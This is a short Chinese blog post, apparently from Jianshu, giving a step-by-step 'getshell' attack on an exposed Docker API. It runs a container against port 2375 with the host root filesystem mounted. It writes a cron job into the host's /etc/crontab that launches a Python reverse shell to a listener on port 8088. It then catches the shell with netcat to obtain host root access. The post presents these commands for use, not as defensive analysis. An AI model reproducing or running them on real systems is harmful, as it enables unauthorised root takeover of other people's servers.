Docker api getshell

docker -H xxxx:2375 run -it -v /:/opt ubuntu bash

echo -e "* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"   IP   \",8088));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" >> /opt/etc/crontab

这个IP 填写容器内的IP 172.17.0.X
然后在容器里,执行 nc -vvlp 8088

等一会你就会发现Docker主机的root权限,已经弹到容器内了。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • docker学习笔记
    转载自 http://blog.opskumu.com/docker.html 一、Docker 简介 Docke...
    极客圈阅读 10,532评论 0 120
  • Docker-Linux-02
    五、Docker 端口映射 无论如何,这些 ip 是基于本地系统的并且容器的端口非本地主机是访问不到的。此外,除了...
    R_X阅读 1,792评论 0 7
  • 第一本Docker书
    第一本Docker书 自动精简配置: thin-provisioning加载device-mapper模块sudo...
    崩芭大酱阅读 2,202评论 0 16
  • 以ance结尾的名词原来有这么多
    后缀是拓展单词量的重要武器,单词中的常用后缀有100多个,今天我们来学习以ance结尾的单词。 ance代表名词,...
    虐单词阅读 33,083评论 0 1
  • 倪妮
    纳兰詹姆斯阅读 311评论 0 0